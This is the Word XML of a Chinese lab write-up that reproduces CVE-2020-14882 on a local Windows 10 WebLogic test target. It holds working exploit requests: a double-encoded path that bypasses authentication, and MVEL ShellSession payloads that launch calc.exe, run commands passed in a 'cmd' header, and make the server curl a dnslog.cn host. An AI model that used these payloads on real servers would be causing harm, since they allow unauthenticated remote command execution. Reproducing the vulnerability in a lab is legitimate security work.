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0"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://my.oschina.net/u/4330619/blog/4698813" \t "https://my.oschina.net/u/4330619/blog/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>CVE-2020-14882 Weblogic 命令执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(By Jean)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0967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Cs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21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7" w:name="_GoBack"/>
          <w:bookmarkEnd w:id="7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b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:sz w:val="36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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc2419 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44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漏洞环境</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2419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bCs w:val="0"/>
              <w:szCs w:val="44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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc20659 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44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部署weblogic</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20659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bCs w:val="0"/>
              <w:szCs w:val="44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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc4166 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44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漏洞复现</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4166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bCs w:val="0"/>
              <w:szCs w:val="44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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc20934 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44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 </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>未授权访问漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20934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bCs w:val="0"/>
              <w:szCs w:val="44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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc3084 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44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3.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>命令执行漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3084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bCs w:val="0"/>
              <w:szCs w:val="44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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc8861 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44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3.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>dnslog进行漏洞验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8861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bCs w:val="0"/>
              <w:szCs w:val="44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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> HYPERLINK \l _Toc2483 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44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参考</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2483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bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
        <w:p>
          <w:pPr>
            <w:jc w:val="center"/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44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:szCs w:val="44"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc2419"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="17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0"/>
        <w:gridCol w:w="1862"/>
        <w:gridCol w:w="1682"/>
        <w:gridCol w:w="2138"/>
        <w:gridCol w:w="16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140" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr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操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1682" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1698" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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Java环境（java -version）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靶机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US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Windows10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="168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192.168.96.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="213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1903</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1698" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="13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60" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
              <w:ind w:left="420" w:leftChars="0" w:right="0" w:hanging="420" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4D4D4D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4D4D4D"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>java version "1.8.0_211"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="13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60" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
              <w:ind w:left="420" w:leftChars="0" w:right="0" w:hanging="420" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
                <w:i w:val="0"/>
                <w:caps w:val="0"/>
                <w:color w:val="4D4D4D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4D4D4D"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Java(TM) SE Runtime Environment (build 1.8.0_211-b12)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="13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60" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
              <w:ind w:left="420" w:leftChars="0" w:right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4D4D4D"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Java HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial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" w:name="_Toc20659"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>部署weblogic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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Windows10上部署weblogic 12.2.1.4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Cmd（管理员）下执行以下安装命令：</w:t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8"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>java -jar fmw_12.2.1.4.0_wls_lite_generic.jar</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="10795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提示安装失败，查询得知是jdk环境变量配置有问题，修改配置后再次安装。</w:t>
      </w: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5271770" cy="2307590"/>
            <wp:effectExtent l="0" t="0" r="1143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0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选择含示列的完整安装</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="4185285"/>
            <wp:effectExtent l="0" t="0" r="127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设置口令（weblogic/a******）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3866515"/>
            <wp:effectExtent l="0" t="0" r="127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66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启动域</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3957320"/>
            <wp:effectExtent l="0" t="0" r="1206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7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部署完成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="26911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91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bookmarkStart w:id="2" w:name="_Toc4166"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc20934"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>未授权访问漏洞</w:t>
      </w:r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"http://192.168.96.130:7001/console/css/%252e%252e%252fconsole.portal"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http://192.168.96.130:7001/console/css/%252e%252e%252fconsole.portal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2713355"/>
            <wp:effectExtent l="0" t="0" r="889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4" w:name="_Toc3084"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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Burpsuite执行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/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&amp;_pageLabel=HomePage1&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) HTTP/1.1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Host: 192.168.96.130:7001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Cache-Control: max-age=0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Upgrade-Insecure-Requests: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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Referer: http://192.168.96.130:7001/console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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: ADMINCONSOLESESSION=-uyHnk6IL4ajzxhcdrZN6Whz-9_gtogX1JjsjYkO1C6oMugrEE-y!1722453502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close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成功弹出计算器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2477135"/>
            <wp:effectExtent l="0" t="0" r="63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Burpsuite执行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/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1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Host: 192.168.96.130:7001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cmd: whoami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682750"/>
            <wp:effectExtent l="0" t="0" r="12065" b="635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Burpsuite执行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/console/css/%252e%252e%252fconsole.portal HTTP/1.1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Host: 192.168.96.130:7001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cmd: whoami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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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close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application/x-www-form-urlencoded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1258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_nfpb=true&amp;_pageLabel=&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();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weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();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java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");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field.setAccessible(true);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 obj = field.get(adapter);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weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);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cmd = req.getHeader("cmd");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String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};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(cmd != null)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String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();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weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);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res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));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res.getServletOutputStream().flush();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res.getWriter().write("");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}executeThread.interrupt();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返回：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="1811655"/>
            <wp:effectExtent l="0" t="0" r="5715" b="444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1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执行whoami&amp;&amp;ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2099310"/>
            <wp:effectExtent l="0" t="0" r="635" b="889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" w:name="_Toc8861"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dnslog进行漏洞验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/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/console/css/%252e%252e%252fconsole.portal?_nfpb=true&amp;_pageLabel=&amp;handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20mefncs.dnslog.cn');") HTTP/1.1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Host: 192.168.96.130:7001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Cache-Control: max-age=0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Upgrade-Insecure-Requests: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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Referer: http://192.168.96.130:7001/console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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: ADMINCONSOLESESSION=-uyHnk6IL4ajzxhcdrZN6Whz-9_gtogX1JjsjYkO1C6oMugrEE-y!1722453502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close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2896870"/>
            <wp:effectExtent l="0" t="0" r="1079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6" w:name="_Toc2483"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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"https://blog.csdn.net/xuandao_ahfengren/article/details/109364543"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https://blog.csdn.net/xuandao_ahfengren/article/details/109364543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"https://github.com/jas502n/CVE-2020-14882"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https://github.com/jas502n/CVE-2020-14882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C40DF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="83C40DF7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D75C40BF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D75C40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742DC0"/>
    <w:rsid w:val="00DD3E4D"/>
    <w:rsid w:val="01F6406F"/>
    <w:rsid w:val="042738C1"/>
    <w:rsid w:val="05021181"/>
    <w:rsid w:val="053C0C73"/>
    <w:rsid w:val="05BF3566"/>
    <w:rsid w:val="05F7726B"/>
    <w:rsid w:val="06B30BE8"/>
    <w:rsid w:val="08854F49"/>
    <w:rsid w:val="099B7C6D"/>
    <w:rsid w:val="0C717510"/>
    <w:rsid w:val="0D2A698E"/>
    <w:rsid w:val="0F2B09DC"/>
    <w:rsid w:val="10DE70B9"/>
    <w:rsid w:val="10F37C66"/>
    <w:rsid w:val="111F3E91"/>
    <w:rsid w:val="16CB493C"/>
    <w:rsid w:val="19D46F8F"/>
    <w:rsid w:val="1A742DC0"/>
    <w:rsid w:val="1B6D7346"/>
    <w:rsid w:val="1C851876"/>
    <w:rsid w:val="1EC57A56"/>
    <w:rsid w:val="20694640"/>
    <w:rsid w:val="209D3F8F"/>
    <w:rsid w:val="24D669D4"/>
    <w:rsid w:val="26542E30"/>
    <w:rsid w:val="26C21C4A"/>
    <w:rsid w:val="286317E8"/>
    <w:rsid w:val="2ADD4945"/>
    <w:rsid w:val="2BC83F48"/>
    <w:rsid w:val="2D356A0D"/>
    <w:rsid w:val="2E140C8B"/>
    <w:rsid w:val="2EC33EB6"/>
    <w:rsid w:val="30374994"/>
    <w:rsid w:val="322576BE"/>
    <w:rsid w:val="33A174D9"/>
    <w:rsid w:val="35D44FFF"/>
    <w:rsid w:val="36E03768"/>
    <w:rsid w:val="377765DA"/>
    <w:rsid w:val="3B990C00"/>
    <w:rsid w:val="3E0E37AB"/>
    <w:rsid w:val="3E832C76"/>
    <w:rsid w:val="40173EDE"/>
    <w:rsid w:val="40696F2B"/>
    <w:rsid w:val="409C4A46"/>
    <w:rsid w:val="420F7436"/>
    <w:rsid w:val="43277135"/>
    <w:rsid w:val="439D64C6"/>
    <w:rsid w:val="43F728DA"/>
    <w:rsid w:val="44D55CD6"/>
    <w:rsid w:val="48E12BCD"/>
    <w:rsid w:val="4A6E484E"/>
    <w:rsid w:val="4C875362"/>
    <w:rsid w:val="4DFC33D6"/>
    <w:rsid w:val="526C38DF"/>
    <w:rsid w:val="530509EB"/>
    <w:rsid w:val="54BE7551"/>
    <w:rsid w:val="54CA60C5"/>
    <w:rsid w:val="58DA7580"/>
    <w:rsid w:val="590B7074"/>
    <w:rsid w:val="5A3C51E8"/>
    <w:rsid w:val="5AD35914"/>
    <w:rsid w:val="5B622C63"/>
    <w:rsid w:val="5DD141BD"/>
    <w:rsid w:val="5EA957D9"/>
    <w:rsid w:val="5F5C310E"/>
    <w:rsid w:val="603F33AE"/>
    <w:rsid w:val="61C45FF0"/>
    <w:rsid w:val="62BF2100"/>
    <w:rsid w:val="65D4477C"/>
    <w:rsid w:val="6A457BB3"/>
